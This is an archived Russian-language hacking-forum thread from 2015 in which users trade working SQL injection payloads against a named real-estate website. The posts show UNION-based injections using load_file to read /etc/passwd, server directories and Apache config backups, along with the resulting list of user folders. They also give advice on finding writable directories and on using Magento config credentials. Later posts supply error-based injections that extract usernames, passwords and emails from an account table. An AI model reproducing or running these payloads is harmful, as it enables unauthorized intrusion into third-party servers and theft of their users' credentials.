ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.06.2015, 17:58
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1'+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a),1+)+--+;&src=1
Как узнать где сайт лежит?
|
|
|
08.06.2015, 18:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
|
|
|
|
08.06.2015, 18:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Все хорошо, но
Код:
Code:
_SERVER["SCRIPT_FILENAME"] /home/lwdhost/www/live.realcove.com/index.php
http://5788sagebrookdrive.com/phpinfo.php
Br@!ns
Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.
----------
спасибо на этом хотя бы
|
|
|
|
08.06.2015, 18:42
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Все хорошо, но
Код:
Code:
_SERVER["SCRIPT_FILENAME"] /home/lwdhost/www/live.realcove.com/index.php
http://5788sagebrookdrive.com/phpinfo.php
Br@!ns
Аналогично, /etc/passwd,говорит как раз что www-юзер имеет /home/lwdhost.
радость-то какая, наконец-то могу пощупать эту фишку freebsd:
Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/etc/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
т. е. при чтении директории получаете список файлов и папок
директория /home/lwdhost/
Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+123,123,load_file%28%27/home/lwdhost/%27%29,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,123,1+%29+--+;&src=1
почему такая ерунда с папками? в httpd прописаны алиасы:
Код:
Code:
http://5788sagebrookdrive.com/property-details?mls=-1%27+/*!uNIoN*/+%28/*!SelEcT*/+1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,load_file%28%27/home/MPS.httpd.conf.bk25oct2010%27%29,1+%29+--+;&src=1
Код:
Code:
addisonklein
advancedlabs
brian
brian1
cameron
canon-copier
coldwellca
cortexx
dns
formbuilder
grijalva
impact
jennie
jira
lwdhost
mayer
mlsimages
olyins
outgoing
pcmls
puddlejumpers
riverbendranch
ryanm
steve1
tara
theofficialjeff
tyler
unixsa
vera
koliopoulos
gsmls
MPS.httpd.conf.bk25oct2010
MPS.php.ini.bk25oct2010
VPS.httpd.conf.bk25oct2010
VPS.php.ini.bk25oct2010
нужно перебрать все папки и найти доступную на чтение и запись, заодно найти httpd.conf и найти для каждого document_root
|
|
|
|
09.06.2015, 00:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql:
.SpoilerTarget" type="button">Spoiler: code
*password*
Что она означает? и как можно подключиться по этим данным?
|
|
|
|
09.06.2015, 00:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от Br@!ns
Br@!ns said:
↑
в magento конфиге (local.xml) есть вот такая запись, ниже данных Mysql:
Spoiler: code
*password*
Что она означает? и как можно подключиться по этим данным? Похоже на Redis Cache, в нете туториалы есть )
|
|
|
|
11.06.2015, 12:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
2015
Репутация:
5
|
|
Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010.
|
|
|
|
11.06.2015, 13:51
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от rumbln
rumbln said:
↑
Помогите составить запрос в бд плиз) ситуация следующая, есть скуля необходимо узнать название колонки в которой имеется значение 3.00 для юзера с id=6010. SELECT * FROM таблица_с_юзерами WHERE id = 6010.
в ответе получите все данные по пользователю и узнаете имя колонки
|
|
|
|
11.06.2015, 16:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
1354
Репутация:
0
|
|
Хелп плз
при попытке выполнить 25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1появляется ошибка Query failed : FUNCTION realmd.ExtractValue does not exist
Как я понял, в этой версии mysql еще нет функции ExtractValue.Какие есть альтернативы?
P.S.
25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,username,password,email) from account limit 0,1), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-log
|
|
|
|
11.06.2015, 16:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от AndreyBerkut
AndreyBerkut said:
↑
Хелп плз
при попытке выполнить
25'or(ExtractValue(1,concat(0x5C,(select(SUBSTRING (group_concat(count(*)),1))from(realmd.account)))) )and(1)='1
появляется ошибка
Query failed : FUNCTION realmd.ExtractValue does not exist
Как я понял, в этой версии mysql еще нет функции
ExtractValue.
Какие есть альтернативы?
P.S.
25'OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(version(), 1, 63), FLOOR(RAND(0)*2)))and(1)='1 проходит, выводит: 5.0.67-logПо по воду версий https://dev.mysql.com/doc/refman/5.1...functions.html.
Если остальные техники вывода не отрабатывают, используйте вывод через ошибку группировки.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
